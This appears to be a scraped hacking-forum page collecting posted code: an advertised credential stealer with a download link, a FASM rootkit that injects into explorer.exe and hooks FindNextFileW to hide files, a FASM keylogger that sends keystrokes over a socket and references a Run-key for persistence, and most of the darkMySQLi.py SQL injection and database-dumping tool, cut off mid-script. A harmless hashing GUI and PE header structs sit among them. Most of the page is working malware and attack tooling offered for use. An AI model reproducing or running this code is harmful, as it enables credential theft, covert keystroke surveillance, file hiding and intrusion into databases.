Nytro

by E0N struct IMAGE_DOS_HEADER e_magic dw ? ; Magic number e_cblp dw ? ; Bytes on last page of file e_cp dw ? ; Pages in file e_crlc dw ? ; Relocations e_cparhdr dw ? ; Size of header in paragraphs e_minalloc dw ? ; Minimum extra paragraphs needed e_maxalloc dw ? ; Maximum extra paragraphs needed e_ss dw ? ; Initial (relative) SS value e_sp dw ? ; Initial SP value e_csum dw ? ; Checksum e_ip dw ? ; Initial IP value e_cs dw ? ; Initial (relative) CS value e_lfarlc dw ? ; File address of relocation table e_ovno dw ? ; Overlay number e_res0 dw ? ; Reserved words e_res1 dw ? e_res2 dw ? e_res3 dw ? e_oemid dw ? ; OEM identifier (for e_oeminfo) e_oeminfo dw ? ; OEM information; e_oemid specific e_res20 dw ? ; Reserved words e_res21 dw ? e_res22 dw ? e_res23 dw ? e_res24 dw ? e_res25 dw ? e_res26 dw ? e_res27 dw ? e_res28 dw ? e_res29 dw ? e_lfanew dd ? ; File address of new exe header ends struct IMAGE_FILE_HEADER Machine dw ? NumberOfSections dw ? TimeDateStamp dd ? PointerToSymbolTable dd ? NumberOfSymbols dd ? SizeOfOptionalHeader dw ? characteristics dw ? ends struct IMAGE_DATA_DIRECTORY VirtualAddress dd ? Size dd ? ends struct IMAGE_OPTIONAL_HEADER ; Standard fields. Magic dw ? MajorLinkerVersion db ? MinorLinkerVersion db ? SizeOfCode dd ? SizeOfInitializedData dd ? SizeOfUnitializedData dd ? AddressOfEntryPoint dd ? BaseOfCode dd ? BaseOfData dd ? ; NT additional fields. ImageBase dd ? SectionAlignment dd ? FileAlignment dd ? MajorOperatingSystemVersion dw ? MinorOperatingSystemVersion dw ? MajorImageVersion dw ? MinorImageVersion dw ? MajorSubsystemVersion dw ? MinorSubsystemVersion dw ? W32VersionValue dd ? SizeOfImage dd ? SizeOfHeaders dd ? CheckSum dd ? SubSystem dw ? DllCharacteristics dw ? SizeOfStackReserve dd ? SizeOfStackCommit dd ? SizeOfHeapReserve dd ? SizeOfHeapCommit dd ? LoaderFlags dd ? NumberOfRvaAndSizes dd ? DataDirectory1 IMAGE_DATA_DIRECTORY ? DataDirectory2 IMAGE_DATA_DIRECTORY ? DataDirectory3 IMAGE_DATA_DIRECTORY ? DataDirectory4 IMAGE_DATA_DIRECTORY ? DataDirectory5 IMAGE_DATA_DIRECTORY ? DataDirectory6 IMAGE_DATA_DIRECTORY ? DataDirectory7 IMAGE_DATA_DIRECTORY ? DataDirectory8 IMAGE_DATA_DIRECTORY ? DataDirectory9 IMAGE_DATA_DIRECTORY ? DataDirectory10 IMAGE_DATA_DIRECTORY ? DataDirectory11 IMAGE_DATA_DIRECTORY ? DataDirectory12 IMAGE_DATA_DIRECTORY ? DataDirectory13 IMAGE_DATA_DIRECTORY ? DataDirectory14 IMAGE_DATA_DIRECTORY ? DataDirectory15 IMAGE_DATA_DIRECTORY ? DataDirectory16 IMAGE_DATA_DIRECTORY ? ends struct IMAGE_NT_HEADERS Signature dd ? FileHeader IMAGE_FILE_HEADER ? OptionalHeader IMAGE_OPTIONAL_HEADER ? ends

by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8 Only gets 1 Password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maby trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copys for sale! Also, This is first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html

Credit to protos the autor of this code require 'digest/md5' require 'digest/sha1' require 'base64' require 'tk' root= TkRoot.new() {title "Encripter By pRotos"} TkLabel.new(root) { text "Palabra a Encriptar" pack { padx 20 ; pady 20; side 'top' } } palabra = TkVariable.new() TkEntry.new(root) { textvariable(palabra) pack() } TkLabel.new(root) { text " MD5" pack ("side"=>"bottom") } md5 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "SHA1" pack ('side'=> 'bottom') } sha = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkLabel.new(root) { text "Base64" pack ( 'side'=> 'bottom' ) } b64 = TkText.new(root) { width 25; height 2 }.pack("side"=>"bottom") TkButton.new(root) { text " Encripta" command proc { amd5 = Digest::MD5.hexdigest(palabra.value) asha1 = Digest::SHA1.hexdigest(palabra.value) ab64 = Base64.encode64(palabra.value) puts " _MD5_", amd5 puts " _SHA1_", asha1 puts " _Base64_", ab64 md5.insert('end', amd5) sha.insert('end', asha1) b64.insert('end', ab64) } pack("side"=>"top") } TkButton.new(root) { text " Clear " command proc { md5.clear sha.clear b64.clear } pack("side"=>"bottom") } Tk.mainloop()

;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress locals BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc FuncionHook,hFindFile,lpFindFileData Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start

include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if byte[eax]=VK_ESCAPE stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC stdcall isShift cmp ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl siguienteHook cmp byte[eax],90 ;VK_Z jg siguienteHook ;Letras A-Z stdcall isShift cmp ecx,1 jne listo mov eax,[lParam] add byte[eax],32 listo: stdcall ProcesarTecla,eax siguienteHook: invoke CallNextHookEx,[hHook],[nCode],[wParam],[lParam] ret endp proc ProcesarTecla,tecla ; Procesa la tecla capturada ;cmp [ifSock],1 ;je sEnviar ;sGuardar: ;invoke GetWindowsDirectory,WinPath,1024 ;invoke lstrcat,WinPath,nArch ;invoke CreateFile,WinPath,GENERIC_READ,0,0,OPEN_ALWAYS,0,0 ;mov [hArch],eax ;invoke GetFileSize, [hArch],NULL ;mov [fSize],eax ;invoke LocalAlloc, LPTR,[fSize] ;mov [Buffer],eax ;invoke ReadFile,[hArch],[Buffer],[fSize],dLeidos,NULL ;invoke CloseHandle,[hArch] ;invoke lstrcat,[Buffer],[tecla] ;invoke CreateFile,WinPath,GENERIC_WRITE,0,0,CREATE_ALWAYS,0,0 ;invoke lstrlen,[Buffer] ;invoke WriteFile,[hArch],[Buffer],eax,dLeidos,NULL ;invoke CloseHandle,[hArch] ;ret sEnviar: invoke GetForegroundWindow cmp eax,[hVentana] je enviartecla mov [hVentana],eax invoke GlobalAlloc,GPTR,256 push eax invoke GetWindowText,[hVentana],eax,256 pop eax mov ebx,eax stdcall EnviarDatos,Espacio stdcall EnviarDatos,Espacio stdcall EnviarDatos,ebx stdcall EnviarDatos,Espacio enviartecla: stdcall EnviarDatos,[tecla] ret endp proc EnviarDatos,datos invoke lstrlen,[datos] invoke send,[hSock],[datos],eax,0 ret endp ;Función para obtener el estado de las mayúsculas proc isShift invoke GetKeyState,VK_CAPITAL cmp eax,1 jl pulsada jmp nopulsada pulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg noShift jmp siShift nopulsada: invoke GetKeyState,VK_SHIFT cmp eax,1 jg siShift jmp noShift siShift: ; Retornamos 0 si está mayúscula, 1 si no mov ecx,1 ret noShift: mov ecx,0 ret endp

# *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker #!/usr/bin/python # 1/30/09 ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # Multi-Purpose MySQL Injection Tool # FUNCTIONS # *union injection # *blind injection # *post and get method injection ** POST not working yet # *full information_schema enumeration # *table and column fuzzer # *database information extractor # *column length finder # *load_file fuzzer # *general info gathering # *MySQL hash cracker # FEATURES # *Round Robin Proxy w/ a proxy list (non-auth or auth proxies) # *Proxy Auth (works great with Squid w/ basic auth) # *Random browser agent chosen everytime the script runs # *debug mode for seeing every URL request, proxy used, browser agent used # Share the c0de! (f*ck Windows! Get a real OS!) # darkc0de Crew # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen # and the darkc0de crew # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # CHANGES # 1.6 ADDED --end evasion setting # 1.5 Fixed --strart now starts at correct number instead of +1 # 1.4 Fixed schema mode when a table was specified - app would hand after last column # 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping) # 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string # BE WARNED, THIS TOOL IS VERY LOUD.. import urllib, sys, re, os, socket, httplib, urllib2, time, random ##Set default evasion options here arg_end = "--" # examples "--", "/*", "#", "%00", "--&SESSIONID=00hn3gvs21lu5ke2f03bxr" <-- if you need vars after inj point arg_eva = "+" # examples "/**/" ,"+", "%20" ## colMax variable for column Finder colMax = 200 ## Set the default timeout value for requests socket.setdefaulttimeout(10) ## Default Log File Name logfile = "darkMySQLi.log" ## File Location to fuzz with for TABLE fuzzer tablefuzz = "tablesfuzz.txt" ## File Location to fuzz with for COLUMN fuzzer columnfuzz = "columnsfuzz.txt" ## File Location to fuzz with for LOAD_FILE fuzzer loadfilefuzz = "loadfilefuzz.txt" ## Agents agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)", "Microsoft Internet Explorer/4.0b1 (Windows 95)", "Opera/8.00 (Windows NT 5.1; U; en)"] #URL Get Function def GetThatShit(head_URL): source = "" global gets;global proxy_num head_URL = head_URL.replace("+",arg_eva) request_web = urllib2.Request(head_URL) request_web.add_header('User-Agent',agent) while len(source) < 1: if arg_debug == "on": print "\n[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" try: gets+=1;proxy_num+=1 source = proxy_list[proxy_num % proxy_len].open(request_web).read() except (KeyboardInterrupt, SystemExit): raise except (urllib2.HTTPError): print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Trying again!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" break except: print "[-] Unexpected error:", sys.exc_info()[0],"\n[-] Look at the error and try to figure it out!" print "[proxy]:",proxy_list_count[proxy_num % proxy_len]+"\n[agent]:",agent+"\n[debug]:",head_URL,"\n" raise return source #the guts and glory - Binary Algorithim that does all the guessing for the Blind Methodology def GuessValue(URL): lower = lower_bound;upper = upper_bound while lower < upper: try: mid = (lower + upper) / 2 head_URL = URL + ">"+str(mid) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: lower = mid + 1 else: upper = mid except (KeyboardInterrupt, SystemExit): raise except: pass if lower > lower_bound and lower < upper_bound: value = lower else: head_URL = URL + "="+str(lower) source = GetThatShit(head_URL) match = re.findall(arg_string,source) if len(match) >= 1: value = lower else: value = 63 print "Could not find the ascii character! There must be a problem.." print "Check to make sure your using the my script right!" print "READ xprog's blind sql tutorial!\n" sys.exit(1) return value ## Functions for MySQL5 hash cracking --- THANKS d3hydr8 def c1(word): s = hashlib.sha1() s.update(word[:-1]) s2 = hashlib.sha1() s2.update(s.digest()) return s2.hexdigest() def c2(word): s = sha.new() s.update(word[:-1]) s2 = sha.new() s2.update(s.digest()) return s2.hexdigest() ## Funtion for MySQL323 hash cracking def mysql323(clear): # Taken almost verbatim from mysql's source nr = 1345345333 add = 7 nr2 = 0x12345671 retval = "" for c in clear: if c == ' ' or c == '\t': continue tmp = ord(c) nr ^= (((nr & 63) + add) * tmp) + (nr << 8) nr2 += (nr2 << 8) ^ nr add += tmp res1 = nr & ((1 << 31) - 1) res2 = nr2 & ((1 << 31) - 1) return "%08lx%08lx" % (res1, res2) #say hello if len(sys.argv) <= 1: print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help darkc0de.com |" print "|--------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h" or arg == "--help": print "\n darkMySQLi v1.6 rsauron@gmail.com" print " forum.darkc0de.com" print "Usage: ./darkMySQLi.py [options]" print "Options:" print " -h, --help shows this help message and exits" print " -d, --debug display URL debug information\n" print " Target:" print " -u URL, --url=URL Target url\n" print " Methodology:" print " -b, --blind Use blind methodology (req: --string)" print " -s, --string String to match in page when the query is valid" print " Method:" print " --method=PUT Select to use PUT method ** NOT WORKING" print " Modes:" print " --dbs Enumerate databases MySQL v5+" print " --schema Enumerate Information_schema (req: -D," print " opt: -T) MySQL v5+" print " --full Enumerate all we can MySQL v5+" print " --info MySQL Server configuration MySQL v4+" print " --fuzz Fuzz Tables & Columns Names MySQL v4+" print " --findcol Find Column length MySQL v4+" print " --dump Dump database table entries (req: -T," print " opt: -D, -C, --start) MySQL v4+" print " --crack=HASH Crack MySQL Hashs (req: --wordlist)" print " --wordlist=LIS.TXT Wordlist to be used for cracking" print " Define:" print " -D DB database to enumerate" print " -T TBL database table to enumerate" print " -C COL database table column to enumerate" print " Optional:" print " --ssl To use SSL" print " --end To use + and -- for the URLS --end \"--\" (Default)" print " To use /**/ and /* for the URLS --end \"/*\"" print " --rowdisp Do not display row # when dumping" print " --start=ROW Row number to begin dumping at" print " --where=COL,VALUE Use a where clause in your dump" print " --orderby=COL Use a orderby clause in your dump" print " --cookie=FILE.TXT Use a Mozilla cookie file" print " --proxy=PROXY Use a HTTP proxy to connect to the target url" print " --output=FILE.TXT Output results of tool to this file\n" sys.exit(1) #define variables site = "" proxy = "None" arg_string = "" arg_blind = "--union" arg_table = "None" arg_database = "None" arg_columns = "None" arg_row = "Rows" arg_cookie = "None" arg_insert = "None" arg_where = "" arg_orderby = "" arg_debug = "off" arg_rowdisp = 1 arg_adminusers = 10 arg_wordlist = "" arg_ssl = "off" arg_proxy_auth = "" darkc0de = "concat(0x1e,0x1e," mode = "None" lower_bound = 0 upper_bound = 16069 line_URL = "" count_URL = "" cur_db = "" cur_table = "" terminal = "" count = 0 gets = 0 table_num = 0 num = 0 ser_ver = 3 version =[] let_pos = 1 lim_num = 0 agent = "" #Check args for arg in sys.argv: if arg == "-u" or arg == "--url": site = sys.argv[count+1] elif arg == "--output": logfile = sys.argv[count+1] elif arg == "--proxy": proxy = sys.argv[count+1] elif arg == "--proxyauth": arg_proxy_auth = sys.argv[count+1] elif arg == "--dump": mode = arg;arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg;arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg;arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg;arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg;arg_info = sys.argv[count] elif arg == "--crack": mode = arg;arg_hash = sys.argv[count+1] elif arg == "--wordlist": arg_wordlist = sys.argv[count+1] elif arg == "--findcol": mode = arg;arg_findcol = sys.argv[count] elif arg == "--cookie": arg_cookie = sys.argv[count+1] elif arg == "--ssl": arg_ssl = "on" elif arg == "-b" or arg == "--blind": arg_blind = arg;arg_blind = sys.argv[count] elif arg == "-s" or arg == "--string": arg_string = sys.argv[count+1] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "--start": num = int(sys.argv[count+1]) - 1 table_num = num elif arg == "-d" or arg == "--debug": arg_debug = "on" elif arg == "--where": arg_where = sys.argv[count+1] elif arg == "--orderby": arg_orderby = sys.argv[count+1] elif arg == "--rowdisp": arg_rowdisp = sys.argv[count] arg_rowdisp = 0 elif arg == "--end": arg_end = sys.argv[count+1] if arg_end == "--": arg_eva = "+" else: arg_eva = "/**/" count+=1 #Title write file = open(logfile, "a") print "\n|--------------------------------------------------|" print "| rsauron@gmail.com v1.6 |" print "| 1/2009 darkMySQLi.py |" print "| -- Multi Purpose MySQL Injection Tool -- |" print "| Usage: darkMySQLi.py [options] |" print "| -h help 